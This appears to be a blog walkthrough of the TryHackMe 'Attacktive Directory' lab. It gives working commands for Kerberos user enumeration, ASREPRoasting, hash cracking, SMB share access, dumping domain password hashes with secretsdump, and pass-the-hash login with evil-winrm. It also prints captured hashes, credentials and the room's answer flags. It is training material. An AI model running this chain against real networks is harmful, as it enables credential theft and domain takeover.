TryHackMe ActiveDirectory || Walkthrough
Welcome! It is time to look at the Attacktive Directory room of THM. I am making these walkthroughs to keep myself motivated to learn cyber security, and ensure that I remember the knowledge gained by THMs rooms.
Join me on learning cyber security. I will try and explain concepts as I go, to differentiate myself from other walkthroughs.
Room URL: https://tryhackme.com/room/attacktivedirectory
Task 1 (Deploy the machine)
I assume you have tried this before. Start up the machine on THM, and start up your Kali machine or AttackBox. Let’s move on.
Task 2 (Setup)
The only thing to do here is to install Impacket, Bloodhound, and Neo4j.
In summary, you need to take these steps:
git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/ && python3 ./setup.py installRead the instructions on THM if you need more help. If you use an AttackBox you are likely ready to go!
Questions
Install Impacket, Bloodhound, and Neo4j
Answer: No answer needed.
Task 3 (Welcome to Attacktive Directory)
Basic enumeration starts out with an Nmap scan. Nmap is a relatively complex utility that has been refined over the years to detect what ports are open on a device, what services are running, and even what operating system is running. It’s important to note that not all services may be detected correctly and not enumerated to it’s fullest potential. Despite Nmap being an overly complex utility, it cannot enumerate everything. Therefore after an initial Nmap scan, we’ll be using other utilities to help us enumerate the services running on the device.
For more information on Nmap, check out the Nmap room.
Questions
Let’s start running a Nmap before answering questions. For this, I use the following command:
nmap -sV -sC -oN nmap.out <target ip>This gives the following results:
Results of running Nmap
We see a bunch of services: DNS, IIS, Kerberos, RPC, NetBIOS, Active Directory, and more! Now we can start answering questions.
What tool will allow us to enumerate port 139/445?
Ports 139 and 445 are used by SMB. To enumerate SMB a great tool to use is enum4linux.
Answer: enum4linux
What is the NetBIOS-Domain Name of the machine?
Here we can simply run:
enum4linux <target ip>
The NetBIOS domain name is mentioned several times.
Answer: THM-AD.
What invalid TLD do people commonly use for their Active Directory Domain?
TLD stands for Top Level Domain. If we look back at the Nmap results, we can see the AD Domain mentioned in the info on port 3389. The domain is called spooky set. local.
Answer: local
Task 4 (Enumerating Users via Kerberos)
A whole host of other services are running, including Kerberos. Kerberos is a key authentication service within Active Directory. With this port open, we can use a tool called Kerbrute (by Ronnie Flathers @ropnop) to brute force discovery of users, passwords, and even password spray!
For this box, a modified User List and Password List will be used to cut down on the time of enumeration of users and password hash cracking. It is NOT recommended to brute force credentials due to account lockout policies that we cannot enumerate on the domain controller.
Questions
What command within Kerbrute will allow us to enumerate valid usernames?
Some good documentation can be found here:
GitHub — ropnop/kerbrute: A tool to perform Kerberos pre-auth bruteforcing
A tool to quickly brute force and enumerate valid Active Directory accounts through Kerberos Pre-Authentication Grab the…
We can find here that the answer to this question is userenum.
Answer: userenum
What notable account is discovered? (These should jump out at you)
First, we need to download Kerbrute from here:
Release v1.0.3 · ropnop/kerbrute
You can’t perform that action at this time. You signed in with another tab or window. You signed out in another tab or…
I used:
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64Then we need to run chmod +x on the executable to get the proper permissions. We can then use ./kerbrute_linux_amd64 to run Kerbrute.
To discover user accounts we can now run:
kerbrute userenum -dc <target ip> -d spookysec.local userlist.txtThe user list we need to use is found here:
https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
Running the command gives us the following:
Using kerkbrute to find Kerberos users
There are some interesting accounts here. The ones that stand out are svc-admin and backup.
Answer: svc-admin
What is the other notable account is discovered? (These should jump out at you)
Answer: backup
Task 5 (Abusing Kerberos)
After the enumeration of user accounts is finished, we can attempt to abuse a feature within Kerberos with an attack method called ASREPRoasting. ASReproasting occurs when a user account has the privilege “Does not require Pre-Authentication” set. This means that the account does not need to provide valid identification before requesting a Kerberos Ticket on the specified user account.
Retrieving Kerberos Tickets
Impacket has a tool called “GetNPUsers.py” (located in impacket/examples/GetNPUsers.py) that will allow us to query ASReproastable accounts from the Key Distribution Center. The only thing that’s necessary to query accounts is a valid set of usernames which we enumerated previously via Kerbrute.
Questions
We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?
It’s time to find the GetNPUsers script, which is located at /opt/impact/examples:
Finding the script
You can quickly get to the folder by running Impacket in the terminal, after which you can change the directory to the examples folder.
Afterward, add the two numbers' names from before in a simple text file.
We can then run:
python GetNPUsers.py -no-pass -usersfile ./users.txt -dc-ip <target ip> spooky.local/This returns that the user svc-admin can query a ticket with no password! We the the following Kerberos hash:
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:408ee4a3e91ec877b931d35c56364c77$63dc9e093d6f3ddfd0074033786ed4d4d6e5f3e9f27be7f98866c0c91c4271c6c8a721eafa9e343a2b9638da64fe71d7563c31e51e6aac0686ba9025ab8ff2d41b8b24f38888cd803c70568744a12daa95cca16b73fa6bc5b20f1fb697b29fd1fe39fa0553ae07ad7e6e2f5232e306ee2abf3ee2ba8ebc704bc96f0d60cd245f96f4caa7c20c3a673fba2b25a384593b01e334560348a146d9168e1fc594b8c59e11382193bd2b3f1c421f9d5fdc61167c8f3bfa18d60fc6fca79923c16b707927719330363b593c28ccc0c7dd2c5e7696b43d45a4bc016341f773805c53f51d2b6ae4a0fa3c3280a18a9d53d9b5fd08337cAnswer: svc-admin
Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)
If we look at the following page:
example_hashes [hashcat wiki]
If you get a “line length exception” error in hashcat, it is often because the hash mode that you have requested does…
We can see that it is hashmode number 18200 since it starts with the same characters ($krb5asrep). The name for this type of hash is Kerberos 5 AS-REP type 23.
Answer: Kerberos 5 AS-REP etype 23
What mode is the hash?
Answer: 18200
Now crack the hash with the modified password list provided, what is the user account password?
Now that we know the mode, we can use hashcat to crack the Cerberus hash. Make sure you save it to a file. You also need to save the password list located at https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt.
Then run the following command:
hashcat -m 18200 hash.txt passwordlist.txtThis gives us the answer:
Cracking the Kerberos hash
It is on the end of the string.
Answer: management2005
Task 6 (Back to the Basics)
With a user’s account credentials, we now have significantly more access within the domain. We can now attempt to enumerate any shares that the domain controller may be giving out.
Questions
What utility can we use to map remote SMB shares?
Answer: smbclient
Which option will list shares?
You can find this answer by running man smb client.
The answer is -L.
Answer: -L
How many remote shares is the server listing?
Run the following command:
smbclient -L <target ip> -U svc-admin
Listing the SMB shares as svc-admin
The number is 6.
Answer: 6
There is one particular share that we have access to that contains a text file. Which share is it?
We can run the following command to access the backup share as svc-admin:
smbclient \\\\<target ip>\\backup -U svc-admin
Accessing the backup share
Answer: backup
What is the content of the file?
See above. Download the file by using get.
Answer: YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw
Decoding the contents of the file, what is the full contents?
We can decode the base64 by entering it at the following url:
Base64 Decode and Encode — Online
Decode from Base64 format or encode into it with various advanced options. Our site has an easy to use online tool to…
This seems to be a username and password!
Answer: backup@spookysec.local:backup2517860
Task 7 (Elevating Privileges within the Domain)
Now that we have new user account credentials, we may have more privileges on the system than before. The username of the account “backup” gets us thinking. What is this the backup account to?
Well, it is the backup account for the Domain Controller. This account has a unique permission that allows all Active Directory changes to be synced with this user account. This includes password hashes.
Knowing this, we can use another tool within Impacket called “secretsdump.py”. This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer. Exploiting this, we will effectively have full control over the AD Domain.
Questions
What method allowed us to dump NTDS.DIT?
Look at the output.
Using secretsdump to retrieve password hashes
Answer: DRSUAPI
What is the Administrators NTLM hash?
Answer: 0e0363213e37b94221497260b0bcb4fc
What method of attack could allow us to authenticate as the user without the password?
https://en.wikipedia.org/wiki/Pass_the_hash
Answer: pass the hash
Using a tool called Evil-WinRM what option will allow us to use a hash?
Read more info here:
https://github.com/Hackplayers/evil-winrm
-H
Answer: -H
Task 8 (Flag Submission Panel)
Submit the flags for each user account. They can be located on each user’s desktop.
Questions
We start by running the following command:
evil-winrm -i <target ip> -u Administrator -H 0e0363213e37b94221497260b0bcb4fcThis gives us the following result:
Using WinRM to authenticate without a password
We now have admin access!
Now we can visit each user’s desktop to find the flag.
svc-admin
Reading the svc-admin flag
Answer: TryHackMe{K3rb3r0s_Pr3_4uth}
Now do the same for the other users.
backup
Reading the backup flag
Answer: TryHackMe{B4ckM3UpSc0tty!}
Administrator
Reading the administrator flag
Answer: TryHackMe{4ctiveD1rectoryM4st3r}
We are done! Great job. This was at times slightly difficult for me, as THM has until now not given me tons of experience hacking Active Directory. It was definitely fun though and has taught me tons!
Thank you for reading!
